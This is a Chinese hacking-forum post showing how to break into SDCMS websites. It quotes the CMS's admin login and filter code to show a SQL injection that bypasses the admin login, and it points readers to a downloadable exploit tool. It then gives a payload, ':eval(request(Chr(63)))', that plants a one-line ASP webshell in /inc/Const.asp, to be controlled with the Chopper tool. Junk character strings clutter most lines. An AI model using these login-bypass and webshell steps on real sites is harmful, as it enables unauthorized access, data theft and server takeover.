作者:T00LS 鬼哥
$ ?" k8 {# T$ ]) _! _6 r漏洞文件:后台目录/index.asp
! l |) f. H0 S5 E1 A( M0 `4 O& ~0 H/ ~
Sub Check
) n5 B2 s! l0 N- U! P Dim username,password,code,getcode,Rs; P. [/ s5 w8 K5 O; r
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub& ?; ^# c3 k: Z) Z) S- U6 S) v; x
username=FilterText(Trim(Request.Form("username")),1)
( f% @: v# I# c+ u2 T, Y( Z password=FilterText(Trim(Request.Form("password")),1). ~% d( B- x2 S6 M. D O
code=Trim(Request.Form("yzm"))
6 Z; k D& e0 ~% v2 e/ k getcode=Session("SDCMSCode")3 d7 h" t& D- I q
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
. ^) y! d' h9 _4 A IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)"ied
+ z, j6 C2 ~: V! T4 ] IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
7 m( M4 [ V, c) \ IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied4 U4 Q8 l, ^3 w2 R: V
IF username="" or password="" Then/ r A4 A9 V0 s4 O9 ]
Echo "用户名或密码不能为空"ied( f+ z+ F5 I' V- z9 |" Z) d
Else
2 ]$ X. l6 U+ l7 R7 I Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
V2 N# P; u0 C& G" F& u X IF Rs.Eof Then: v S4 I6 I0 H7 p& d
AddLog username,GetIp,"登录失败",1
% Y' _" ~3 E, V/ C% b Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"0 n" G# m7 m7 t V, D( z
Else
2 @5 M$ w# M# l" y" F" } Add_Cookies "sdcms_id",Rs(0) P/ G+ N+ v$ H# B$ M# P
Add_Cookies "sdcms_name",username7 T* I! |, B y p# A. {& e
Add_Cookies "sdcms_pwd",Rs(2), a! I# Q4 x D
Add_Cookies "sdcms_admin",Rs(3)
3 ~& g, o1 n; K: D. E0 L' N4 J Add_Cookies "sdcms_alllever",Rs(4)
+ G3 J) v) B! [. z Add_Cookies "sdcms_infolever",Rs(5)% g7 ]( }+ o2 I
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
+ m3 w- @; [8 R. ~! N; i& C AddLog username,GetIp,"登录成功",1
# u. z( m1 g7 E1 ]( l- ~8 N3 X '自动删除30天前的Log记录4 B1 f" \2 k$ M K4 a
IF Sdcms_DataType Then& D9 r( o5 [5 \2 ] W
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
E+ G" L5 s, Q7 D2 [+ T7 d Else
# \+ m$ t" g, A2 P3 z Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")0 w o- e' V- i* I% B2 R0 y" n4 n
End IF0 v( k5 K8 h9 V
Go("sdcms_index.asp") l( @5 A* V! W4 W6 `) V4 w8 ~
End IF
' z3 A5 R7 Y/ \+ Q8 A$ E Rs.Close
) {( l$ E+ N" _! a0 g2 a/ r, c& ], b Set Rs=Nothing
: _7 P+ O& r) J; p) x8 h" m End IF
) Q% o! [6 P4 g* C8 k2 ~End Sub
$ T+ {4 v+ q3 f. K4 |& H& }3 z
9 p1 J" |$ }) c* l t* {’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码# Y! G/ ]4 x2 a- Z6 O& A
$ ~( w P0 @8 ]3 r7 D1 ~% aFunction FilterText(ByVal t0,ByVal t1)
+ c% l& a: ?9 M, U* V IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
9 p- X# J! L4 B t0=Trim(t0)" [+ r* Y6 g; M+ T6 J
Select Case t1
( G! t6 ]9 _$ J/ }. g* U Case "1"' I" s, R. `1 b+ K" }8 s4 D; z7 g! j
t0=Replace(t0,Chr(32),"")
. {" `, Y8 G: i/ R8 }) w t0=Replace(t0,Chr(13),"")
9 \& ^# _1 n9 u& O' d t0=Replace(t0,Chr(10)&Chr(10),"")- K/ D( G7 n! r6 o) J- k0 ^' j
t0=Replace(t0,Chr(10),"")* h# M$ |8 W0 k/ ^$ t' j3 X8 O0 L
Case "2"
0 ? L7 _0 z- @; Z! v t0=Replace(t0,Chr(8),"")'回格/ y/ ?- k8 z. f
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
4 S" a2 @* F2 Y$ R( o t0=Replace(t0,Chr(10),"")'换行 O/ e" b; F' T- _( |
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)' f5 E- D0 |2 O; n
t0=Replace(t0,Chr(12),"")'换页1 R: j6 Y& T! V, T. U6 {
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
0 I- w: [7 Q- H. x1 }" m t0=Replace(t0,Chr(22),"")3 T# M& @8 R: K2 F6 o
t0=Replace(t0,Chr(32),"")'空格 SPACE8 {3 E/ P5 Q# U' R2 `5 i# Z' j5 W% S
t0=Replace(t0,Chr(33),"")'!8 P' V1 I% j+ Z# S1 t5 f
t0=Replace(t0,Chr(34),"")'"( d$ L+ n2 |7 d2 f1 C
t0=Replace(t0,Chr(35),"")'#+ X' p4 ^0 g' V; j* p7 O
t0=Replace(t0,Chr(36),"")'$( D3 j$ H" A. ]
t0=Replace(t0,Chr(37),"")'%
B# j) M$ |. ~* d7 f. J0 k t0=Replace(t0,Chr(38),"")'&
* \8 M. |; ~- N8 v& z$ A t0=Replace(t0,Chr(39),"")''4 C1 C) `7 T5 W
t0=Replace(t0,Chr(40),"")'(5 j% c! `+ W8 m+ B3 b$ X7 B! B( X
t0=Replace(t0,Chr(41),"")')! w! D# d7 O$ |& L8 B0 o
t0=Replace(t0,Chr(42),"")'*0 N+ z' I0 V5 E+ m- Z6 u2 R
t0=Replace(t0,Chr(43),"")'+
/ m+ x- _1 V' y4 G, s% j1 B t0=Replace(t0,Chr(44),"")',, Z: z" g j/ W* @9 `5 i- c7 `
t0=Replace(t0,Chr(45),"")'-# D$ { Z7 S$ I( N; L* p8 y1 n
t0=Replace(t0,Chr(46),"")'.
) }3 I) u& Y7 A. M t0=Replace(t0,Chr(47),"")'/$ N3 y L/ t' U
t0=Replace(t0,Chr(58),"")':
% R |/ u; |6 H5 w& O t0=Replace(t0,Chr(59),"")';
+ q! W% |- o) i/ O) @9 S t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
9 E8 g+ ?; }2 k4 F. s6 D- V7 l t0=Replace(t0,Chr(63),"")'?% S. X# i, A# Q! T! S$ ?: M1 [
t0=Replace(t0,Chr(64),"")'@5 a/ X* G* ?; g% n0 d/ j
t0=Replace(t0,Chr(91),"")'\$ [+ X1 R9 l) O
t0=Replace(t0,Chr(92),"")'\
5 u f- [) A* n t0=Replace(t0,Chr(93),"")']7 j8 F+ u+ r$ ]6 _; b7 [" d
t0=Replace(t0,Chr(94),"")'^$ C9 }, m" S* ?8 e. u- e
t0=Replace(t0,Chr(95),"")'_
; z: z9 a- j+ r5 M6 S t0=Replace(t0,Chr(96),"")'`
) e' `" z& F) u% n t0=Replace(t0,Chr(123),"")'{ i1 G' U0 Q! p9 d
t0=Replace(t0,Chr(124),"")'|
6 `! g& h2 n- X4 f4 Q& L t0=Replace(t0,Chr(125),"")'}
: o" l- s, t1 f4 U, g% l t0=Replace(t0,Chr(126),"")'~
/ q v- s6 y, c$ g Case Else5 o$ j9 _0 M% g+ E" c( K! e
t0=Replace(t0, "&", "&")& C8 p# T2 ]! Q* v+ v$ d) P3 _
t0=Replace(t0, "'", "'")9 m; ?. E+ g, ]" @0 z
t0=Replace(t0, """", """)
; Q& X. r6 o4 G( u x/ W, X) G9 ? t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
- A4 ~; f/ D" S* [ End Select
; s6 K& i. s) K ^1 b4 b3 z8 \9 K IF Instr(Lcase(t0),"expression")>0 Then
/ y" O: Y$ j( b6 y1 [1 p t0=Replace(t0,"expression","e­xpression", 1, -1, 0)% E! {4 p" f( P O7 T; T2 i" o
End If) a/ _5 z/ e# s" V* N7 R$ v) F
FilterText=t0' P6 c! A2 S. A5 H2 Z* D
End Function1 Y( h( n% S* C* @
; c8 n$ g; z% ~5 u. {+ ]2 X2 q! ^
看到没。直接参数是1 只过滤. L" @; _, ?0 {) j0 r2 F' L7 M* r
t0=Replace(t0,Chr(32)," ")# I: G9 v- r2 `2 F! }
t0=Replace(t0,Chr(13),"")' j6 P; h( K# s8 S
t0=Replace(t0,Chr(10)&Chr(10),"
( D8 s8 u% ~* t")6 X1 _( E# e4 p+ x& A- H
t0=Replace(t0,Chr(10),"
% L* _% `9 u4 d* i% r: {! h2 h5 D")$ I* j5 L! j/ v" w# _
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!9 B7 J Y$ S( ~- G
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
' H9 Z+ f& k5 k$ ^6 y z% I1 K3 Z9 G# a4 O# v' F
测试:
7 D$ m, I) `3 N O( M5 p' u3 D, K- l; t# T$ B3 [( w* E
9 g5 f% z v$ ?- H- `现在输入工具上验证码,然后点OK
9 P5 `; X2 b9 s% Q7 }
; c% H# I# b y6 }% w0 S$ T. Q+ D7 u' ?
看到我们直接进入后台管理界面了,呵呵!* B5 h2 r, z3 L w4 A7 w8 q& `
+ b! o$ s" U" l' f2 P8 q1 }
4 L+ I/ f9 r$ u2 e9 Q
$ F: w# ? o/ k3 R这样直接进入后台了。。。。
0 I5 n m0 B# m7 u" k$ G! U: g0 q/ f2 I6 C* A* Z) o. H
/ _7 m( J& W" E" t5 y
1 }# d8 S* k/ [9 E0 b
SDCMS提权:, `# t' U; M" Q2 J/ n
% b) O, Y( F7 ?$ ]. a' i
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
1 M1 a' c8 l3 o8 ~( f# ^
5 v3 I6 [1 }& v. p" q, }
: M) P- g7 i$ ^( C' c6 c. |
, `! f! q- Q7 i8 N' K7 T4 lOK,现在用菜刀连接下!
% q! J7 S6 A. p# n, t y, G- p, N% z* B' _: _
) u6 b( P# \5 `" x l
2 b, m0 m( U: Y# _
% m S4 T! _% B" d# u% c S( v+ M9 e( T1 \( {" ]
|